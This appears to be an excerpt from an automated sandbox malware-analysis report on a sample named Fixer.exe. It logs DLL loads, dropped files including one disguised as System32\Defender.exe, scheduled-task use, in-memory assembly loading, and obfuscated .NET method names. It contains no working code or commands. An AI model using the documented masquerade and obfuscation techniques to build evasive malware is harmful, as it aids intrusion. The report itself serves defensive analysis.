                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\Defender.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\Defender.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\Defender.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\Defender.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\Defender.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\Defender.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\Defender.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\Defender.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\Defender.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\Defender.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\Defender.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\Defender.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\Defender.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\Defender.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\Defender.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\Defender.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\Defender.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\Defender.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\Defender.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\Defender.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\Defender.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\Defender.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\Defender.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\Defender.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\Defender.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\Defender.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\Defender.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\Defender.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\Defender.exeSection loaded: version.dll
                  Source: C:\Windows\System32\Defender.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\Defender.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\Defender.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\Defender.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\Defender.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\Defender.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\Defender.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\Defender.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\Defender.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\Defender.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\Defender.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\Defender.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\Defender.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\Defender.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\Defender.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\Defender.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\Defender.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\Defender.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\Defender.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\Defender.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\System32\Defender.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\Defender.exeSection loaded: schannel.dll
                  Source: C:\Users\user\Desktop\Fixer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\System32\Defender.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Fixer.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Fixer.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbKo source: Defender.exe, 00000011.00000002.2761764861.000000001B175000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdb source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: Defender.exe, 00000011.00000002.2761764861.000000001B175000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdbRSDS source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbDib source: Defender.exe, 00000011.00000002.2761764861.000000001B175000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System32\Defender.PDB source: Defender.exe, 00000011.00000002.2761764861.000000001B175000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: .pdbhnh source: Defender.exe, 00000011.00000002.2762358645.000000001B2F8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdb source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: C:\Windows\SYSTEM32\DNSAPI.dll.pdb source: Defender.exe, 0000000B.00000002.2591740114.000000001B580000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.pdb source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: q34e089\mscorlib.pdb source: Defender.exe, 00000011.00000002.2762358645.000000001B2F8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: YTR[^f"ghkb.pdb source: Defender.exe, 0000000B.00000002.2591740114.000000001B5CF000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.pdb source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: System.pdb source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: 0C:\Windows\mscorlib.pdb source: Defender.exe, 0000000B.00000002.2592285856.000000001B778000.00000004.00000010.00020000.00000000.sdmp, Defender.exe, 00000011.00000002.2762358645.000000001B2F8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdbRSDS# source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: C:\Windows\System32\Defender.PDBn7 source: Defender.exe, 00000011.00000002.2762358645.000000001B2F8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Core.ni.pdb source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb+i source: Defender.exe, 00000011.00000002.2761764861.000000001B175000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: Defender.exe, 00000011.00000002.2761764861.000000001B175000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb source: Defender.exe, 0000000B.00000002.2591740114.000000001B580000.00000004.00000020.00020000.00000000.sdmp, Defender.exe, 00000011.00000002.2761764861.000000001B100000.00000004.00000020.00020000.00000000.sdmp, Defender.exe, 00000011.00000002.2761764861.000000001B175000.00000004.00000020.00020000.00000000.sdmp, WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: Defender.exe, 00000011.00000002.2761764861.000000001B175000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Management.ni.pdbRSDSJ< source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: System.Management.pdb source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: mscorlib.ni.pdb source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: System.Management.ni.pdb source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: System.Core.pdb source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: \??\C:\Windows\mscorlib.pdbsmx source: Defender.exe, 00000011.00000002.2761764861.000000001B175000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: symbols\dll\mscorlib.pdbpdbHA source: Defender.exe, 0000000B.00000002.2592285856.000000001B778000.00000004.00000010.00020000.00000000.sdmp, Defender.exe, 00000011.00000002.2762358645.000000001B2F8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: indoC:\Windows\mscorlib.pdb source: Defender.exe, 0000000B.00000002.2592285856.000000001B778000.00000004.00000010.00020000.00000000.sdmp, Defender.exe, 00000011.00000002.2762358645.000000001B2F8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb 3 source: Defender.exe, 0000000B.00000002.2591740114.000000001B5CF000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdb source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: System.Core.ni.pdbRSDS source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr

                  Data Obfuscation

                  barindex
                  .NET source code contains potential unpacker
                  Source: 6z9uno0baqvej0me.exe.0.dr, XvtqplFAmRakHnvLtpT.cs.Net Code: KkakfDiBwfKYVVbOUQ System.AppDomain.Load(byte[])
                  Source: 6z9uno0baqvej0me.exe.0.dr, XvtqplFAmRakHnvLtpT.cs.Net Code: KkakfDiBwfKYVVbOUQ
                  Source: 6z9uno0baqvej0me.exe.0.dr, FeMXZbEkIGjJgevW.cs.Net Code: roZsWKRBZOrvYxlj System.Reflection.Assembly.Load(byte[])
                  Source: FixerNerest.exe.0.dr, GprCBzVajSFPhcvMz.cs.Net Code: NMmrnMiPoxTKxWYciysWlr System.Reflection.Assembly.Load(byte[])
                  Source: FixerNerest.exe.0.dr, EwsvuuRydySCmvfwUdTl.cs.Net Code: FyRyFitGWcSvLUVgQQryVi System.AppDomain.Load(byte[])
                  Source: FixerNerest.exe.0.dr, EwsvuuRydySCmvfwUdTl.cs.Net Code: FyRyFitGWcSvLUVgQQryVi
                  Source: Defender.exe.4.dr, GprCBzVajSFPhcvMz.cs.Net Code: NMmrnMiPoxTKxWYciysWlr System.Reflection.Assembly.Load(byte[])
                  Source: Defender.exe.4.dr, EwsvuuRydySCmvfwUdTl.cs.Net Code: FyRyFitGWcSvLUVgQQryVi System.AppDomain.Load(byte[])
                  Source: Defender.exe.4.dr, EwsvuuRydySCmvfwUdTl.cs.Net Code: FyRyFitGWcSvLUVgQQryVi
                  Source: Fixer.exeStatic PE information: 0xD22848DC [Tue Sep 23 12:17:32 2081 UTC]
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeCode function: 3_2_00007FF848F200BD pushad ; iretd 3_2_00007FF848F200C1
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeCode function: 3_2_00007FF848F22EF2 push FFFFFFE8h; ret 3_2_00007FF848F22EF9
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeCode function: 4_2_00007FF848F38169 push ebx; ret 4_2_00007FF848F3816A
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeCode function: 4_2_00007FF848F300BD pushad ; iretd 4_2_00007FF848F300C1
                  Source: C:\Windows\System32\Defender.exeCode function: 11_2_00007FF848F28169 push ebx; ret 11_2_00007FF848F2816A
                  Source: C:\Windows\System32\Defender.exeCode function: 11_2_00007FF848F200BD pushad ; iretd 11_2_00007FF848F200C1
                  Source: C:\Windows\System32\Defender.exeCode function: 17_2_00007FF848F28169 push ebx; ret 17_2_00007FF848F2816A
                  Source: 6z9uno0baqvej0me.exe.0.dr, bRFnUZCCzOQQktsWRhAHLOd.csHigh entropy of concatenated method names: 'TGSpzALbonWVUFvPhnynv', 'aYLwQxxWgMnTUO', 'MCzCpbwXWCLl', 'aYPqqEfteDjNeSHJiBlgI', 'lzkGndBotELMvIxw', 'PjOhyPoLIpOoBaEbFm', 'GkRBrpKfBRXyMlY', 'xunnjvueonAsdHkq', 'gqsxhWrnjmulqBCc', 'GhRzhKpmNDp'
                  Source: 6z9uno0baqvej0me.exe.0.dr, ETYzyWSLPrOWhkiLrBuXTiPY.csHigh entropy of concatenated method names: 'oOWCJmYcQnvjThiXoz', 'ihhMfqXbAabVEzYJI', 'JFEqtQwnbXULzejrptHBrLmL', 'CpSrkuXabftSsnQPr', 'zGoawmMJeCGFxT', 'TrbevrdxlYzpYxGqmzxnEib', 'ffaQUTWhaZZvplwXWJDCxwn', 'YMUFAfokPiyQR', 'cSCRPzYKBBCZR', 'fZvirOsIyQhukogGmgGJglAg'
                  Source: 6z9uno0baqvej0me.exe.0.dr, LRPADrZpfFFGcDsfIXCuiNHyQ.csHigh entropy of concatenated method names: '_003CRun_003Eb__1_0', 'MVeqnrHUVu', 'JPRxKQjqNiQvhhLWOJIH', 'NtWrdHcWXWDpoPep', 'ZGRNcTvawIbVsLMnPvWvGhI', 'TpMNGsRhgWjB', 'FkaaRgzBBeKqCZTHtlrxKu', 'GiUDrtoWbKxJLwVpAJFSL', 'WDTyZmksEe', 'yTrxcIHMHifFP'
                  Source: 6z9uno0baqvej0me.exe.0.dr, PthsnsfGDgeBRScSJU.csHigh entropy of concatenated method names: 'WPvtoNyDLTEGaSogXzMEc', 'kzIqtnFcyd', 'EDdQWEFDXUaxCBQpXUsAf', 'VfvlxTKxiVbT', 'PLQAvHAFgJCFocyi', 'GcHvhxUkGltZ', 'EVjfBeGTwseCpVtgIqMPa', 'zMahNwQoWHgvEg', 'JbTboJkctscaExug', 'KpWWETQKDIWXW'
                  Source: 6z9uno0baqvej0me.exe.0.dr, xqLvAWoeLo.csHigh entropy of concatenated method names: 'CdUisxkdFkFeaDfLWDmvGKKb', 'BzDhNhZlzFIpfXjDqWRsL', 'rULSaZsqrTsxqxhwsCfsb', 'XWqgDsPosiYRHiWvHztJNowhg', 'VtePMSIswobuWAaDaJYYp', 'awvfzRliaJzRXVJdWFIPmhTMd', 'jJOmJHwWThTgTrHNOSvFdEu', 'nSQaMtdiCGibUnzrVBCcJpmRH', 'SBRYPfPRyqrVJaDle', 'JftaSDjbBRmyg'
                  Source: 6z9uno0baqvej0me.exe.0.dr, GwWhqodDdzluu.csHigh entropy of concatenated method names: 'IvIOGuRhWYFMuHjkQGxan', 'HaLHdRFAtRAByccwKJtZa', 'betVTtifxUzXoiDzRzbVeoLtI', 'ITvngOKKygNH', 'MSOUfCbousLstxESmTAMMlOjJ', 'kMdjWlJBODQUfqhSNbkunR', 'rMNNulbDfKs', 'OKKWairiBCSnKfu', 'nzPATGmXIYPQnAlKn', 'SHCEJLviEptaDOrEP'
                  Source: 6z9uno0baqvej0me.exe.0.dr, mDQHYyyDgioFBJZV.csHigh entropy of concatenated method names: 'yJRtvjLKoz', 'uGmefcsTfwexqBNYFzT', 'CsUetdcqUExkzUJawJZZQFpE', 'MbrhLGKUDbBlIlCz', 'zayuyWsnbv', 'ufwCQKgBkJIynPwsIo', 'XXZOGPFZOFztjKkaYeyVxE', 'PtqcLfCdjz', 'XCUQqnKkSwkPZnDoYOKTqT', 'KVPnuuMbQuvnhFHnK'
                  Source: 6z9uno0baqvej0me.exe.0.dr, iEyzZzYuVgHBHuvSVDszSVn.csHigh entropy of concatenated method names: 'DmzaqXtfORSlWFCGyP', 'lfPhiSWydevaNQWwnzxExmcnp', 'JwQAlBCYBwnFRITZQB', 'rFUAJPGAKzzDcrG', 'aicsuXpPaIii', 'lYWbUyWovHlfBrYBtKNLzs', 'nIYTQFZAhXLZbdbItjTearM', 'gQNhyUXpshjSvfGjWHDHqRx', 'RCTcfNQvvfmzrsCMA', 'gtuJMOckITnFCOTp'
                  Source: 6z9uno0baqvej0me.exe.0.dr, yPMoFGhLUJIDtqrdoF.csHigh entropy of concatenated method names: 'AvNubljotLBITSjnNSJvirWcI', 'HgspljehAflVlDV', 'ozSAolKCeLeJRJZ', 'lJeCvDZRdmSDCrgFZPDWJ', 'dVWpKaEUPqGA', 'cZSWkaAXBSGAmeYjBFCb', 'fIgGtzNIWbxBIEgGsTw', 'kbDQpYvflNlE', 'FwRmQranOfrIzeZsd', 'mFStEFQQUDhX'
                  Source: 6z9uno0baqvej0me.exe.0.dr, KZBUhkwxZIxgGTHyBUdIA.csHigh entropy of concatenated method names: 'qihQwZMWKRbXaA', 'vzbnqyYoZdKgkd', 'hekvjSnQoWkDygEi', 'GlGVCUJQRuInlscsokxnfRu', 'inQFuaIUvRay', 'AfKbfRYedCdIKJvHv', 'pqxmOEEVqlosUS', 'VoFnLzzVdElmxjRMMzD', 'HZNQGXKbmqliKepVqUjOq', 'ThdRGlZZcsQiVvao'
                  Source: 6z9uno0baqvej0me.exe.0.dr, MKCDlISAepQIcIwuZXoEk.csHigh entropy of concatenated method names: 'nHEaTzoWxQZ', 'AFjLdhQolFyaNVhcozCG', 'IXuzKpTMHs', 'jvIrKOuGnv', 'hJdNyRMiyOTerho', 'TsxcdMyrRMpRZ', 'vSGqplVwqBz', 'tmQRRKVCaNqSoVKmv', 'bvJtSAYBrDqWCwcESMbAv', 'vWdhcoBUajAEZEPATPs'
                  Source: 6z9uno0baqvej0me.exe.0.dr, BtukVaynkFNDYhxzrBxPukEK.csHigh entropy of concatenated method names: 'LDSFFMGTtUhoJCk', 'sLtZydnlXBapozRpkTKX', 'iftHjeNQKhzMhCYKlRh', 'hhDmQfuDrEprNCJ', 'ARPyZUMUacGwsfyCdGx', 'bHqEkJYGrH', 'essJTCiqMVjLoYxLMFnOGFJEs', 'KOQwFcTdcEzVfAuQlf', 'wCgmxLBEtsZjoRtrUZPPGrL', 'tMqanUqUdLwYecSlEXakCVLE'
                  Source: 6z9uno0baqvej0me.exe.0.dr, iVqXiRRWbtTaFgrOCj.csHigh entropy of concatenated method names: 'YJwawjgILPSRH', 'bbkjAnvjKbzCCwZtLGH', 'VTlvtnCJFGJcMudE', 'fBvPpyVauhji', 'ELJnKHqppNkleES', 'pISUmgFMEgVQUzFSa', 'CxTZjWOSqnLdLtDDFZQOfY', 'xjemaVqHSLq', 'UEQYwFUpRA', 'UbMRugBMHerVpFjoxz'
                  Source: 6z9uno0baqvej0me.exe.0.dr, XvtqplFAmRakHnvLtpT.csHigh entropy of concatenated method names: 'pvkIPFGCSkUuaiSakf', 'DDDjqbzHeeclvgGp', 'KkakfDiBwfKYVVbOUQ', 'lMtgQxbXqzZOUsrPz', 'kYAUhuvpjJJ', 'WbQjDPQDJn', 'fsCXRqgdFbI', 'rWRezkbOROpcxxlobyvvw', 'UcfWeyCgDYOrYMml', 'SiZmRCaZTErBGfN'
                  Source: 6z9uno0baqvej0me.exe.0.dr, ZAbCfCqEpIJbZTdz.csHigh entropy of concatenated method names: 'lMkuXZVQmvhalwPheBIO', 'CtuNkNjquMbXlNsBaCaF', 'sHJdDMtuuRVlziTqhmMla', 'iFDAjXgEzhIxKmkjgAqvzuG', 'meYKtPOTLzYEaDdWOpSnc', 'YgGxFLveso', 'ROEyVKjTolKOgJdWUhKcSJkGs', 'wKCXgGkFJpZ', 'sfiUnQNSZncpbwiLf', 'dxGROZQRFDeb'
                  Source: 6z9uno0baqvej0me.exe.0.dr, BeNEQBpvCUYMUQvO.csHigh entropy of concatenated method names: 'XmhJotRMrlZrDmPUAPXFV', 'FfmVReXiQT', 'fdcMNMlvsYQQ', 'zhJsTAXIPVg', 'WTbnoJVGjX', 'mHnCmKdepPjV', 'UfOPvzQIvKqtJHDOvJTcY', 'kgykxlqrmnxrTJvFK', 'GArxwIcDZPtFPtLxuhQLB', 'RDXDwSouTpzkVYfnjpH'
                  Source: 6z9uno0baqvej0me.exe.0.dr, kvAdeNHhLAvFBnSPLsjXnmuh.csHigh entropy of concatenated method names: 'KkybJPQqfTa', 'wipTLzNCqsPo', 'CNYRIyBSZUdIGClePVTrGOJtE', 'mhfNRUKeGBsYXVZqXO', 'KExbXbXvwqoDf', 'gLTnMCIybvkmq', 'ySQqvguXpGImuZNoSxMLrJFCL', 'DLcBqkkYxdaxI', 'SIWNfZIjlndnaeHpNNfjdjuoP', 'BWbjNUoOtinsXlDUa'
                  Source: 6z9uno0baqvej0me.exe.0.dr, NmTBqnwpsuQacpSXxPF.csHigh entropy of concatenated method names: 'xuQERGGdzsmey', 'cVTmmTFkOSqSyIviF', 'ZXhTWOjjhTp', 'IlbFMwDLcm', 'MfxNzHxhRmh', 'apJzFCCmmuO', 'EqtvyeucnRVnY', 'kbjmYObhAP', 'xyJZzTSRnI', 'OBimsERJUWaE'
                  Source: 6z9uno0baqvej0me.exe.0.dr, FeMXZbEkIGjJgevW.csHigh entropy of concatenated method names: '_003CPatchMem_003Eb__0', 'SWUgQdUHKXCuFjoLy', 'roZsWKRBZOrvYxlj', 'OvZynxCHmSjPwJch', 'PJyZAKOPDFP', 'zFJWOaQYWErWkj', 'hldEPNUhbkvNlLjjrnsnNat', 'jMJhLSbpQSgdaBzBeXil', 'MeNnUzirweHsvVD', 'mWIJFxTeGJq'
                  Source: 6z9uno0baqvej0me.exe.0.dr, YCqdhaRTimJInloXKuRkyyz.csHigh entropy of concatenated method names: 'uMCOJPwusgMn', 'PTXkYSNOqJWmprPoquZDj', 'VYCJTqPPHYBluatzagls', 'CfcUXhGClmj', 'gyzhOzXzbB', 'kDxovrUtSrfSsapvIJNVlRiNc', 'RMhOtcAirQatLKQtRLAfHHYD', 'pNgLSVjLBZIMEx', 'RKjZVPxCEs', 'XMxmKndzDO'
                  Source: 6z9uno0baqvej0me.exe.0.dr, DqloyPCLKAxwlGUiNTrkNgO.csHigh entropy of concatenated method names: '_003CCheckWMI_003Eb__4_0', 'gHevnUUNJwNuWDCjJuZrjVqjS', 'lOeaFCHQdWAhvAN', 'AQZpTbUtpQex', 'KRucUiFjjqLmFa', 'ibyZeaVZKdyKulkoXJC', 'FFEbRHYQZNDOBpK', 'SFTnprkzVYLyzB', 'cDHadWXHWCEAwakJFaWWRq', 'dOUFFtwZRXZaKt'
                  Source: 6z9uno0baqvej0me.exe.0.dr, FaWSNiFOezDcTYVZCPLVUHimA.csHigh entropy of concatenated method names: 'aFVOrfwcWXAYK', 'QIRzuExzUkYGtUfysk', 'AHztQIYfqCyYeEj', 'MqirvPallpk', 'cxYfQFKTROBrWYGwVLuCK', 'SHJsWkhOHaXnDt', 'THYuPnxprVXJdPavibN', 'QVYjZmCHbUiVNSCDWHu', 'USRWzbDyhfpMqNNxjp', 'dkqNWnBvLNWYagkK'
                  Source: 6z9uno0baqvej0me.exe.0.dr, VyUkcpVGFrRjScwyVUzGJWx.csHigh entropy of concatenated method names: 'OePLlmVmuhYaBYdb', 'gqiCsQpYwtMwaj', 'BxVxZJVTVeolEVwxrXrcgPUVO', 'notJpUyZZECfCFLXMX', 'fkCAwVYiGSl', 'AjzWgZMpUnewsuLVmRI', 'wRjpkownQm', 'GnaCwCifxzijrFGHBKDwpKj', 'iAKlrcZYivYIRsPTElKC', 'hrjegvdNpCwEtT'
                  Source: 6z9uno0baqvej0me.exe.0.dr, UsOroEkJQwDdcBlH.csHigh entropy of concatenated method names: 'tZXWLhbpGPMmxia', 'gBfOIplZEVfpAhsPo', 'gTNzJKmBhpYXSO', 'DvzGsJEoySqClpZWwxj', 'GMhsVbHHwA', 'CRLwltJwEbePhTIBLISc', 'jMWrOHlQCwrxkolZt', 'dmAfabwzYMavzeYHTFpEWl', 'gCfnSxfWbSUoqYDmu', 'PiYpGwNYcUgkpQsNUduoeCtq'
